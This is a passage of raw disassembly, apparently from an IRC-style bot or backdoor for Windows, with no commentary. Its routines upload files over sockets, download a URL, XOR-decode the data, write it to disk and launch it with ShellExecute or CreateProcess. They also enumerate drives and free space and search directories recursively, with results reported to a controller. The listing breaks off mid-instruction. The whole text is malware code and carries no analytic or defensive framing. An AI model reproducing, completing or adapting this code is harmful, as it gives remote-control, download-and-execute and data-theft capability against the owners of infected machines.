sub_415E1B+200j push edi call ds:dword_4CB6EC ; closesocket cmp [ebp+arg_0], esi jz loc_4160E7 mov edi, 400h loc_41604A: ; CODE XREF: sub_415E1B+2C3j mov eax, [ebp+arg_0] mov [ebp+var_4], edi cmp eax, edi jge short loc_416057 mov [ebp+var_4], eax loc_416057: ; CODE XREF: sub_415E1B+237j push edi lea eax, [ebp+var_A04] push esi push eax call sub_41B590 mov eax, [ebp+arg_0] add esp, 0Ch neg eax push 2 push esi push eax push [ebp+var_8] call dword_42711C ; SetFilePointer lea eax, [ebp+var_20] push esi push eax lea eax, [ebp+var_A04] push [ebp+var_4] push eax push [ebp+var_8] call dword_4270E8 ; ReadFile push esi lea eax, [ebp+var_A04] push [ebp+var_4] push eax push [ebp+var_1F8] call ds:dword_4CB6A4 ; send mov [ebp+var_4], eax push esi cdq add [ebp+var_10], eax lea eax, [ebp+var_A04] push edi push eax push [ebp+var_1F8] adc [ebp+var_C], edx call ds:dword_4CB66C ; recv cmp eax, ebx jl loc_41617C mov eax, [ebp+var_4] cmp eax, ebx jl loc_41617C sub [ebp+arg_0], eax jnz loc_41604A mov edi, [ebp+var_18] loc_4160E7: ; CODE XREF: sub_415E1B+224j push [ebp+var_8] call dword_427068 ; CloseHandle push [ebp+var_C] push [ebp+var_10] call sub_416923 pop ecx pop ecx push eax push [ebp+var_44] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_1E0] push eax lea eax, [ebp+var_3FC] push offset unk_437BA8 push eax call sub_41B886 loc_416120: ; CODE XREF: sub_415E1B+1DCj add esp, 14h loc_416123: ; CODE XREF: sub_415E1B+215j cmp [ebp+var_50], esi jnz short loc_416148 push esi lea eax, [ebp+var_3FC] push [ebp+var_54] push eax lea eax, [ebp+var_DC] push eax push [ebp+var_1FC] call sub_409A73 add esp, 14h loc_416148: ; CODE XREF: sub_415E1B+30Bj lea eax, [ebp+var_3FC] push eax call sub_4151AD cmp edi, esi pop ecx jbe short loc_416160 push edi call ds:dword_4CB6EC ; closesocket loc_416160: ; CODE XREF: sub_415E1B+33Cj push [ebp+var_1F8] call ds:dword_4CB6EC ; closesocket push [ebp+var_58] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread loc_41617C: ; CODE XREF: sub_415E1B+2AFj ; sub_415E1B+2BAj push esi mov esi, offset dword_437B90 push [ebp+var_54] lea eax, [ebp+var_DC] push esi push eax push [ebp+var_1FC] call sub_409A73 push esi call sub_4151AD add esp, 18h push [ebp+var_1F8] call ds:dword_4CB6EC ; closesocket push [ebp+var_58] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread sub_415E1B endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4161BD proc near ; DATA XREF: sub_401ACD+7B4o var_14C4 = byte ptr -14C4h var_4C4 = byte ptr -4C4h var_2C4 = byte ptr -2C4h var_1C0 = dword ptr -1C0h var_1B8 = byte ptr -1B8h var_1A4 = byte ptr -1A4h var_A0 = byte ptr -0A0h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 14C4h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi push 6Dh mov esi, eax pop ecx lea edi, [ebp+var_1C0] rep movsd push 1 xor ebx, ebx pop esi mov [ebp+var_8], ebx mov [eax+1B0h], esi lea eax, [ebp+var_2C4] push 104h push eax call dword_427074 ; GetSystemDirectoryA lea eax, [ebp+var_1A4] push eax lea eax, [ebp+var_2C4] push eax lea eax, [ebp+var_2C4] push offset dword_429AD0 push eax call sub_41B886 add esp, 10h lea eax, [ebp+var_2C4] push ebx push 80h push 2 push ebx push esi push 40000000h push eax call dword_4270EC ; CreateFileA cmp eax, 0FFFFFFFFh jnz short loc_416247 push offset unk_437D0C jmp short loc_41628D ; --------------------------------------------------------------------------- loc_416247: ; CODE XREF: sub_4161BD+81j push eax call dword_427068 ; CloseHandle lea eax, [ebp+var_2C4] push offset aAB ; "a+b" push eax call sub_41B4C2 pop ecx cmp eax, ebx pop ecx mov [ebp+var_4], eax jnz short loc_41626F push offset unk_437CDC jmp short loc_41628D ; --------------------------------------------------------------------------- loc_41626F: ; CODE XREF: sub_4161BD+A9j push [ebp+var_20] lea eax, [ebp+var_1B8] push eax call sub_415BD4 pop ecx cmp eax, 0FFFFFFFFh pop ecx mov [ebp+arg_0], eax jnz short loc_4162A0 push offset unk_437CBC loc_41628D: ; CODE XREF: sub_4161BD+88j ; sub_4161BD+B0j lea eax, [ebp+var_4C4] push eax call sub_41B886 pop ecx pop ecx jmp loc_41639C ; --------------------------------------------------------------------------- loc_4162A0: ; CODE XREF: sub_4161BD+C9j mov esi, 1000h loc_4162A5: ; CODE XREF: sub_4161BD+14Ej push esi lea eax, [ebp+var_14C4] push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_14C4] push ebx push esi push eax push [ebp+arg_0] call ds:dword_4CB66C ; recv mov edi, eax cmp edi, ebx jz loc_41636C cmp edi, 0FFFFFFFFh jz short loc_41630D push [ebp+var_4] lea eax, [ebp+var_14C4] push edi push 1 push eax call sub_41D2B4 add [ebp+var_8], edi add esp, 10h push [ebp+var_8] call ds:dword_4CB650 ; htonl mov [ebp+var_C], eax push ebx lea eax, [ebp+var_C] push 4 push eax push [ebp+arg_0] call ds:dword_4CB6A4 ; send jmp short loc_4162A5 ; --------------------------------------------------------------------------- loc_41630D: ; CODE XREF: sub_4161BD+118j lea eax, [ebp+var_4C4] push offset dword_437B90 push eax call sub_41B886 push ebx lea eax, [ebp+var_4C4] push [ebp+var_18] push eax lea eax, [ebp+var_A0] push eax push [ebp+var_1C0] call sub_409A73 lea eax, [ebp+var_4C4] push eax call sub_4151AD push [ebp+var_4] call sub_41B05B add esp, 24h push [ebp+arg_0] call ds:dword_4CB6EC ; closesocket push [ebp+var_1C] call sub_40B413 pop ecx push 1 call dword_4270CC ; ExitThread loc_41636C: ; CODE XREF: sub_4161BD+10Fj mov eax, [ebp+var_8] cdq push edx push eax call sub_416923 pop ecx pop ecx push eax lea eax, [ebp+var_1B8] push eax lea eax, [ebp+var_1A4] push eax lea eax, [ebp+var_4C4] push offset unk_437C90 push eax call sub_41B886 add esp, 14h loc_41639C: ; CODE XREF: sub_4161BD+DEj cmp [ebp+var_14], ebx jnz short loc_4163C1 push ebx lea eax, [ebp+var_4C4] push [ebp+var_18] push eax lea eax, [ebp+var_A0] push eax push [ebp+var_1C0] call sub_409A73 add esp, 14h loc_4163C1: ; CODE XREF: sub_4161BD+1E2j lea eax, [ebp+var_4C4] push eax call sub_4151AD cmp [ebp+var_4], ebx pop ecx jz short loc_4163DC push [ebp+var_4] call sub_41B05B pop ecx loc_4163DC: ; CODE XREF: sub_4161BD+214j cmp [ebp+arg_0], ebx jbe short loc_4163EA push [ebp+arg_0] call ds:dword_4CB6EC ; closesocket loc_4163EA: ; CODE XREF: sub_4161BD+222j push [ebp+var_1C] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread sub_4161BD endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4163FA proc near ; DATA XREF: sub_401ACD+627Ao ; sub_401ACD+6ABAo var_590 = qword ptr -590h var_584 = qword ptr -584h var_510 = byte ptr -510h var_310 = dword ptr -310h var_304 = dword ptr -304h var_2E4 = dword ptr -2E4h var_2E0 = word ptr -2E0h var_2CC = dword ptr -2CCh var_2C8 = byte ptr -2C8h var_248 = byte ptr -248h var_148 = byte ptr -148h var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_24 = byte ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = byte ptr -10h var_8 = qword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 510h mov eax, [ebp+arg_0] push ebx push esi push edi mov ecx, 0AAh mov esi, eax lea edi, [ebp+var_2CC] push 1 rep movsd pop edi xor esi, esi push esi mov [eax+2A4h], edi push esi push esi lea eax, [ebp+var_248] push esi push eax push ds:dword_4CB604 call ds:dword_4CB558 ; InternetOpenUrlA cmp eax, esi mov [ebp+var_18], eax jz loc_416886 push esi push esi push 2 push esi push esi lea eax, [ebp+var_148] push 40000000h push eax call dword_4270EC ; CreateFileA cmp eax, edi mov [ebp+var_20], eax jnb short loc_4164C1 lea eax, [ebp+var_148] push eax lea eax, [ebp+var_510] push offset unk_437ED8 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_30], esi jnz short loc_4164A4 push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 add esp, 14h loc_4164A4: ; CODE XREF: sub_4163FA+88j lea eax, [ebp+var_510] push eax call sub_4151AD push [ebp+var_48] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread loc_4164C1: ; CODE XREF: sub_4163FA+68j xor edi, edi call dword_4270A8 ; GetTickCount mov ebx, 7D000h mov dword ptr [ebp+var_8+4], eax push ebx call sub_41B4D5 pop ecx mov [ebp+var_1C], eax loc_4164DB: ; CODE XREF: sub_4163FA+1B4j push 200h lea eax, [ebp+var_510] push esi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+arg_0] push eax lea eax, [ebp+var_510] push 200h push eax push [ebp+var_18] call ds:dword_4CB560 ; InternetReadFile cmp [ebp+var_34], esi jz short loc_41651F push [ebp+arg_0] lea eax, [ebp+var_510] push eax call sub_4168EC pop ecx pop ecx loc_41651F: ; CODE XREF: sub_4163FA+112j lea eax, [ebp+var_24] push esi push eax lea eax, [ebp+var_510] push [ebp+arg_0] push eax push [ebp+var_20] call dword_4270E0 ; WriteFile cmp edi, ebx jnb short loc_41655D mov eax, ebx sub eax, edi cmp eax, [ebp+arg_0] jbe short loc_416547 mov eax, [ebp+arg_0] loc_416547: ; CODE XREF: sub_4163FA+148j push eax lea eax, [ebp+var_510] push eax mov eax, [ebp+var_1C] add eax, edi push eax call sub_41C310 add esp, 0Ch loc_41655D: ; CODE XREF: sub_4163FA+13Fj add edi, [ebp+arg_0] cmp [ebp+var_3C], esi jz short loc_41656A cmp edi, [ebp+var_3C] ja short loc_4165B4 loc_41656A: ; CODE XREF: sub_4163FA+169j cmp [ebp+var_44], 1 mov eax, edi jz short loc_416584 shr eax, 0Ah push eax lea eax, [ebp+var_248] push eax push offset unk_437EB0 jmp short loc_416594 ; --------------------------------------------------------------------------- loc_416584: ; CODE XREF: sub_4163FA+176j shr eax, 0Ah push eax lea eax, [ebp+var_248] push eax push offset unk_437E88 loc_416594: ; CODE XREF: sub_4163FA+188j mov eax, [ebp+var_48] imul eax, 234h add eax, offset dword_43E390 push eax call sub_41B886 add esp, 10h cmp [ebp+arg_0], esi ja loc_4164DB loc_4165B4: ; CODE XREF: sub_4163FA+16Ej cmp [ebp+var_3C], esi mov [ebp+var_14], 1 jz short loc_416609 cmp edi, [ebp+var_3C] jz short loc_416609 push [ebp+var_3C] lea eax, [ebp+var_510] mov [ebp+var_14], esi push edi push offset unk_437E5C push eax call sub_41B886 push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 lea eax, [ebp+var_510] push eax call sub_4151AD add esp, 28h loc_416609: ; CODE XREF: sub_4163FA+1C4j ; sub_4163FA+1C9j call dword_4270A8 ; GetTickCount sub eax, dword ptr [ebp+var_8+4] xor edx, edx mov ecx, 3E8h push [ebp+var_20] div ecx xor edx, edx mov ecx, eax mov eax, edi inc ecx div ecx mov ebx, eax call dword_427068 ; CloseHandle push [ebp+var_1C] call sub_41B0B1 cmp [ebp+var_38], esi pop ecx jz short loc_416693 lea eax, [ebp+var_148] push eax call sub_4010AB cmp eax, [ebp+var_38] pop ecx jz short loc_416693 push [ebp+var_38] mov [ebp+var_14], esi push eax lea eax, [ebp+var_510] push offset unk_437E34 push eax call sub_41B886 push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 lea eax, [ebp+var_510] push eax call sub_4151AD add esp, 28h loc_416693: ; CODE XREF: sub_4163FA+241j ; sub_4163FA+253j cmp [ebp+var_14], esi jz loc_4168D3 cmp [ebp+var_44], 1 jz loc_41678E mov dword ptr [ebp+var_8], ebx mov dword ptr [ebp+var_8+4], esi fild [ebp+var_8] push ecx push ecx mov dword ptr [ebp+var_8], edi mov dword ptr [ebp+var_8+4], esi fmul dbl_4276A8 lea eax, [ebp+var_148] fstp [esp+584h+var_584] fild [ebp+var_8] push eax push ecx push ecx lea eax, [ebp+var_510] fmul dbl_4276A8 fstp [esp+590h+var_590] push offset unk_437DFC push eax call sub_41B886 add esp, 1Ch cmp [ebp+var_30], esi jnz short loc_41670E push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 add esp, 14h loc_41670E: ; CODE XREF: sub_4163FA+2F2j lea eax, [ebp+var_510] push eax call sub_4151AD cmp [ebp+var_40], 1 pop ecx jnz loc_4168D3 push 5 push esi lea eax, [ebp+var_148] push esi push eax push offset aOpen ; "open" push esi call ds:dword_4CB5C0 cmp [ebp+var_30], esi jnz loc_4168D3 lea eax, [ebp+var_148] push eax lea eax, [ebp+var_510] push offset dword_437DE0 push eax call sub_41B886 push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 lea eax, [ebp+var_510] push eax call sub_4151AD add esp, 24h jmp loc_4168D3 ; --------------------------------------------------------------------------- loc_41678E: ; CODE XREF: sub_4163FA+2A6j mov dword ptr [ebp+var_8], ebx mov dword ptr [ebp+var_8+4], esi fild [ebp+var_8] push ecx push ecx mov dword ptr [ebp+var_8], edi mov dword ptr [ebp+var_8+4], esi fmul dbl_4276A8 lea eax, [ebp+var_148] fstp [esp+584h+var_584] fild [ebp+var_8] push eax push ecx push ecx lea eax, [ebp+var_510] fmul dbl_4276A8 fstp [esp+590h+var_590] push offset unk_437D9C push eax call sub_41B886 add esp, 1Ch cmp [ebp+var_30], esi jnz short loc_4167F6 push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 add esp, 14h loc_4167F6: ; CODE XREF: sub_4163FA+3DAj lea eax, [ebp+var_510] push eax call sub_4151AD push 10h lea eax, [ebp+var_10] push esi push eax call sub_41B590 push 44h lea eax, [ebp+var_310] pop edi push edi push esi push eax call sub_41B590 add esp, 1Ch mov [ebp+var_310], edi lea eax, [ebp+var_10] mov [ebp+var_304], offset byte_43D808 push 1 mov [ebp+var_2E0], si pop edi push eax lea eax, [ebp+var_310] push eax push esi push esi push 28h push esi push esi lea eax, [ebp+var_148] push esi push eax push esi mov [ebp+var_2E4], edi call dword_42706C ; CreateProcessA cmp eax, edi jnz short loc_416878 call ds:dword_4CB5AC ; WSACleanup call sub_41835A push esi call dword_427064 ; ExitProcess loc_416878: ; CODE XREF: sub_4163FA+46Aj lea eax, [ebp+var_148] push eax push offset unk_437D68 jmp short loc_416892 ; --------------------------------------------------------------------------- loc_416886: ; CODE XREF: sub_4163FA+45j lea eax, [ebp+var_248] push eax push offset unk_437D3C loc_416892: ; CODE XREF: sub_4163FA+48Aj lea eax, [ebp+var_510] push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_30], esi jnz short loc_4168C6 push esi lea eax, [ebp+var_510] push [ebp+var_2C] push eax lea eax, [ebp+var_2C8] push eax push [ebp+var_2CC] call sub_409A73 add esp, 14h loc_4168C6: ; CODE XREF: sub_4163FA+4AAj lea eax, [ebp+var_510] push eax call sub_4151AD pop ecx loc_4168D3: ; CODE XREF: sub_4163FA+29Cj ; sub_4163FA+325j ... push [ebp+var_18] call ds:dword_4CB688 ; InternetCloseHandle push [ebp+var_48] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread sub_4163FA endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_4168EC proc near ; CODE XREF: sub_4163FA+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_0] xor ecx, ecx cmp [esp+arg_4], ecx jle short locret_416908 loc_4168F8: ; CODE XREF: sub_4168EC+1Aj mov dl, byte_429094 xor [ecx+eax], dl inc ecx cmp ecx, [esp+arg_4] jl short loc_4168F8 locret_416908: ; CODE XREF: sub_4168EC+Aj retn sub_4168EC endp ; =============== S U B R O U T I N E ======================================= sub_416909 proc near ; CODE XREF: sub_401ACD+5842p ; sub_401ACD+596Ap arg_0 = dword ptr 4 arg_4 = dword ptr 8 push [esp+arg_4] push [esp+4+arg_0] call sub_41D3BE pop ecx pop ecx xor ecx, ecx cmp eax, 0FFFFFFFFh setnz cl mov eax, ecx retn sub_416909 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416923 proc near ; CODE XREF: sub_40F96B+458p ; sub_40F96B+5FDp ... var_38 = byte ptr -38h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h and [ebp+var_4], 0 push ebx push esi push edi push 32h mov edi, offset dword_4D3288 push 0 push edi call sub_41B590 mov ebx, [ebp+arg_0] add esp, 0Ch lea esi, [ebp+var_38] loc_416948: ; CODE XREF: sub_416923+5Bj ; sub_416923+61j push 0 push 0Ah push [ebp+arg_4] push ebx call sub_41D480 push 0 push 0Ah push [ebp+arg_4] add al, 30h mov [esi], al inc esi push ebx call sub_41D410 mov ebx, eax or eax, edx mov [ebp+arg_4], edx jz short loc_416986 inc [ebp+var_4] push 3 mov eax, [ebp+var_4] pop ecx cdq idiv ecx test edx, edx jnz short loc_416948 mov byte ptr [esi], 2Ch inc esi jmp short loc_416948 ; --------------------------------------------------------------------------- loc_416986: ; CODE XREF: sub_416923+4Bj dec esi mov eax, edi loc_416989: ; CODE XREF: sub_416923+73j lea ecx, [ebp+var_38] cmp esi, ecx jb short loc_416998 mov cl, [esi] mov [eax], cl inc eax dec esi jmp short loc_416989 ; --------------------------------------------------------------------------- loc_416998: ; CODE XREF: sub_416923+6Bj and byte ptr [eax], 0 mov eax, edi pop edi pop esi pop ebx leave retn sub_416923 endp ; =============== S U B R O U T I N E ======================================= sub_4169A2 proc near ; CODE XREF: sub_416B57+51p ; sub_416B57+87p arg_0 = dword ptr 4 push [esp+arg_0] call ds:dword_4CB6B4 ; GetDriveTypeA sub eax, 0 jz short loc_4169E5 dec eax jz short loc_4169DF dec eax dec eax jz short loc_4169D9 dec eax jz short loc_4169D3 dec eax jz short loc_4169CD dec eax jz short loc_4169C7 mov eax, offset word_437F2C retn ; --------------------------------------------------------------------------- loc_4169C7: ; CODE XREF: sub_4169A2+1Dj mov eax, offset off_437F28 retn ; --------------------------------------------------------------------------- loc_4169CD: ; CODE XREF: sub_4169A2+1Aj mov eax, offset aCdrom ; "Cdrom" retn ; --------------------------------------------------------------------------- loc_4169D3: ; CODE XREF: sub_4169A2+17j mov eax, offset aNetwork ; "Network" retn ; --------------------------------------------------------------------------- loc_4169D9: ; CODE XREF: sub_4169A2+14j mov eax, offset aDisk ; "Disk" retn ; --------------------------------------------------------------------------- loc_4169DF: ; CODE XREF: sub_4169A2+10j mov eax, offset aInvalid ; "Invalid" retn ; --------------------------------------------------------------------------- loc_4169E5: ; CODE XREF: sub_4169A2+Dj mov eax, offset aUnknown ; "Unknown" retn sub_4169A2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4169EB proc near ; CODE XREF: sub_416A33+12p var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 18h or eax, 0FFFFFFFFh mov [ebp+var_18], eax mov [ebp+var_14], eax mov [ebp+var_10], eax mov [ebp+var_C], eax mov [ebp+var_8], eax mov [ebp+var_4], eax mov eax, ds:dword_4CB544 test eax, eax jz short loc_416A20 lea ecx, [ebp+var_10] push ecx lea ecx, [ebp+var_8] push ecx lea ecx, [ebp+var_18] push ecx push [ebp+arg_4] call eax ; GetDiskFreeSpaceExA loc_416A20: ; CODE XREF: sub_4169EB+22j mov eax, [ebp+arg_0] push esi push edi push 6 pop ecx lea esi, [ebp+var_18] mov edi, eax rep movsd pop edi pop esi leave retn sub_4169EB endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416A33 proc near ; CODE XREF: sub_416B57+17p ; sub_41AA43+1F3p var_198 = byte ptr -198h var_118 = byte ptr -118h var_98 = byte ptr -98h var_18 = dword ptr -18h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 198h push esi push edi push [ebp+arg_4] lea eax, [ebp+var_18] push eax call sub_4169EB pop ecx mov esi, eax pop ecx lea edi, [ebp+var_18] push 6 pop ecx rep movsd mov eax, [ebp+var_18] and eax, [ebp+var_14] cmp eax, 0FFFFFFFFh jz loc_416B11 mov eax, [ebp+var_10] and eax, [ebp+var_C] cmp eax, 0FFFFFFFFh jz loc_416B11 mov eax, [ebp+var_8] and eax, [ebp+var_4] cmp eax, 0FFFFFFFFh jz loc_416B11 push ebx mov ebx, 400h push 0 push ebx push [ebp+var_14] push [ebp+var_18] call sub_41D500 push edx push eax call sub_416923 pop ecx mov edi, offset aSkb ; "%sKB" pop ecx mov esi, 80h push eax push edi lea eax, [ebp+var_198] push esi push eax call sub_41B980 add esp, 10h push 0 push ebx push [ebp+var_C] push [ebp+var_10] call sub_41D500 push edx push eax call sub_416923 pop ecx pop ecx push eax push edi lea eax, [ebp+var_118] push esi push eax call sub_41B980 add esp, 10h push 0 push ebx push [ebp+var_4] push [ebp+var_8] call sub_41D500 push edx push eax call sub_416923 pop ecx pop ecx push eax push edi lea eax, [ebp+var_98] push esi push eax call sub_41B980 add esp, 10h pop ebx jmp short loc_416B43 ; --------------------------------------------------------------------------- loc_416B11: ; CODE XREF: sub_416A33+2Cj ; sub_416A33+3Bj ... mov esi, offset aFailed ; "failed" lea eax, [ebp+var_198] push esi push eax call sub_41B886 pop ecx lea eax, [ebp+var_118] pop ecx push esi push eax call sub_41B886 pop ecx lea eax, [ebp+var_98] pop ecx push esi push eax call sub_41B886 pop ecx pop ecx loc_416B43: ; CODE XREF: sub_416A33+DCj mov eax, [ebp+arg_0] push 60h pop ecx lea esi, [ebp+var_198] mov edi, eax rep movsd pop edi pop esi leave retn sub_416A33 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416B57 proc near ; CODE XREF: sub_416C29+17p ; sub_416C29+60p var_500 = byte ptr -500h var_300 = byte ptr -300h var_180 = byte ptr -180h var_100 = byte ptr -100h var_80 = byte ptr -80h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp sub esp, 500h push ebx mov ebx, [ebp+arg_C] push esi push edi lea eax, [ebp+var_300] push ebx push eax call sub_416A33 push 60h mov esi, eax pop ecx lea edi, [ebp+var_300] rep movsd push 60h lea esi, [ebp+var_300] pop ecx lea edi, [ebp+var_180] lea eax, [ebp+var_80] push offset aFailed ; "failed" rep movsd push eax call sub_41C070 add esp, 10h test eax, eax jnz short loc_416BCA push ebx push ebx call sub_4169A2 pop ecx push eax push offset unk_437F7C lea eax, [ebp+var_500] push 200h push eax call sub_41B980 add esp, 14h jmp short loc_416BFE ; --------------------------------------------------------------------------- loc_416BCA: ; CODE XREF: sub_416B57+4Dj lea eax, [ebp+var_180] push eax lea eax, [ebp+var_100] push eax lea eax, [ebp+var_80] push eax push ebx push ebx call sub_4169A2 pop ecx push eax push offset unk_437F40 lea eax, [ebp+var_500] push 200h push eax call sub_41B980 add esp, 20h loc_416BFE: ; CODE XREF: sub_416B57+71j push 1 lea eax, [ebp+var_500] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 lea eax, [ebp+var_500] push eax call sub_4151AD add esp, 18h pop edi pop esi pop ebx leave retn sub_416B57 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416C29 proc near ; CODE XREF: sub_401ACD+2554p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h push ebp mov ebp, esp push ebx xor ebx, ebx cmp [ebp+arg_C], ebx jz short loc_416C4A push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_416B57 add esp, 10h jmp short loc_416CAB ; --------------------------------------------------------------------------- loc_416C4A: ; CODE XREF: sub_416C29+9j push esi push edi push ebx push ebx call ds:dword_4CB5BC ; GetLogicalDriveStringsA lea esi, [eax+2] push esi call sub_41B4D5 pop ecx mov edi, eax push edi push esi call ds:dword_4CB5BC ; GetLogicalDriveStringsA cmp [edi], bl mov esi, edi jz short loc_416CA2 loc_416C6E: ; CODE XREF: sub_416C29+77j push offset aA_1 ; "A:\\" push esi call sub_41C070 pop ecx test eax, eax pop ecx jz short loc_416C91 push esi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_416B57 add esp, 10h loc_416C91: ; CODE XREF: sub_416C29+54j push esi call sub_41AFE0 cmp [esi+eax+1], bl lea esi, [esi+eax+1] pop ecx jnz short loc_416C6E loc_416CA2: ; CODE XREF: sub_416C29+43j push edi call sub_41B0B1 pop ecx pop edi pop esi loc_416CAB: ; CODE XREF: sub_416C29+1Fj pop ebx pop ebp retn sub_416C29 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416CAE proc near ; DATA XREF: sub_401ACD+68A0o var_49C = byte ptr -49Ch var_29C = dword ptr -29Ch var_298 = byte ptr -298h var_218 = byte ptr -218h var_115 = byte ptr -115h var_114 = byte ptr -114h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 49Ch mov eax, [ebp+arg_0] push ebx push esi push edi mov ecx, 0A7h mov esi, eax lea edi, [ebp+var_29C] rep movsd mov dword ptr [eax+298h], 1 lea eax, [ebp+var_114] push eax call sub_41AFE0 xor ebx, ebx cmp [ebp+eax+var_115], 5Ch pop ecx jnz short loc_416D03 lea eax, [ebp+var_114] push eax call sub_41AFE0 pop ecx mov [ebp+eax+var_115], bl loc_416D03: ; CODE XREF: sub_416CAE+3Fj lea eax, [ebp+var_218] push eax push offset unk_437FDC lea eax, [ebp+var_49C] push 200h push eax call sub_41B980 add esp, 10h cmp [ebp+var_8], ebx jnz short loc_416D48 push ebx lea eax, [ebp+var_49C] push [ebp+var_C] push eax lea eax, [ebp+var_298] push eax push [ebp+var_29C] call sub_409A73 add esp, 14h loc_416D48: ; CODE XREF: sub_416CAE+78j lea eax, [ebp+var_114] push ebx push eax lea eax, [ebp+var_218] push eax lea eax, [ebp+var_298] push [ebp+var_C] push eax push [ebp+var_29C] call sub_416DC9 add esp, 18h push eax lea eax, [ebp+var_49C] push offset dword_437FBC push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_8], ebx jnz short loc_416DA9 push ebx lea eax, [ebp+var_49C] push [ebp+var_C] push eax lea eax, [ebp+var_298] push eax push [ebp+var_29C] call sub_409A73 add esp, 14h loc_416DA9: ; CODE XREF: sub_416CAE+D9j lea eax, [ebp+var_49C] push eax call sub_4151AD push [ebp+var_10] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread pop edi pop esi pop ebx sub_416CAE endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_416DC9 proc near ; CODE XREF: sub_416CAE+B9p ; sub_416DC9+9Ep var_54C = byte ptr -54Ch var_34C = byte ptr -34Ch var_248 = byte ptr -248h var_144 = byte ptr -144h var_118 = byte ptr -118h var_117 = byte ptr -117h var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp sub esp, 54Ch push ebx push esi push edi mov esi, 104h push [ebp+arg_10] lea eax, [ebp+var_248] push offset dword_438020 push esi push eax call sub_41B980 mov edi, dword_427000 add esp, 10h lea eax, [ebp+var_144] push eax lea eax, [ebp+var_248] push eax call edi ; FindFirstFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax mov ebx, offset dword_429AC8 jz short loc_416E86 loc_416E15: ; CODE XREF: sub_416DC9+BBj test [ebp+var_144], 10h jz short loc_416E72 cmp [ebp+var_118], 2Eh jnz short loc_416E39 cmp [ebp+var_117], 0 jz short loc_416E72 cmp [ebp+var_117], 2Eh jz short loc_416E72 loc_416E39: ; CODE XREF: sub_416DC9+5Cj lea eax, [ebp+var_118] push eax lea eax, [ebp+var_34C] push [ebp+arg_10] push ebx push esi push eax call sub_41B980 push [ebp+arg_14] lea eax, [ebp+var_34C] push eax push [ebp+arg_C] push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call sub_416DC9 add 